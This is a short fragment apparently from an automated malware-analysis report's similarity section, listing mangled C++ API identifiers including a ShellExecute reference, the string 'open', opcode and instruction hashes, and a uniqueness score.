                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                  • String ID: open
                                  • API String ID: 317973523-2758837156
                                  • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                  • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                  Uniqueness

                                  Uniqueness Score: -1.00%